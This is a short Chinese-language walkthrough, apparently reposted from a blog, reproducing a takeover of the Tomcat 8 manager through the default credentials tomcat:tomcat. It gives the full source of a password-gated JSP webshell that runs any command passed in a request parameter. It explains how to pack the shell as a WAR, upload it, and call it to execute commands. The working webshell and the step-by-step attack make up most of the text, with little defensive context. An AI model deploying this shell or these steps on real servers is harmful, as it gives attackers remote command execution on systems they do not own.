tomcat8+ 弱口令 && 后台getshell 漏洞復現


1、漏洞利用

訪問http://your ip:8080/manager/html,進入后台登錄,輸入弱密碼tomcat:tomcat。

制作一個木馬文件,准備一個ma.jsp,再將它壓縮成ma.zip,壓縮完成后再將后綴名改為ma.war

木馬內容如下:

 1 <%@ page language="java" contentType="text/html; charset=GBK"
 2 pageEncoding="UTF-8"%>
 3 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
 4 <html>
 5 
 6 <head>
 7 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 8 <title>一句話木馬</title>
 9 </head>
10 
11 <body>
12 <%
13 if ("admin".equals(request.getParameter("pwd"))) {
14 java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
15 int len = -1;
16 byte[] bytes = new byte[4092];
17 out.print("<pre>");
18 while ((len = input.read(bytes)) != -1) {
19 out.println(new String(bytes, "GBK"));
20 }
21 out.print("</pre>");
22 }
23 %>
24 </body>
25 
26 </html>

 

 

上傳我們做好的木馬文件

 

 

 

 

 上傳成功

訪問http://your ip:8080/ma/ma.jsp?pwd=admin&cmd=id

 

 成功執行命令

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM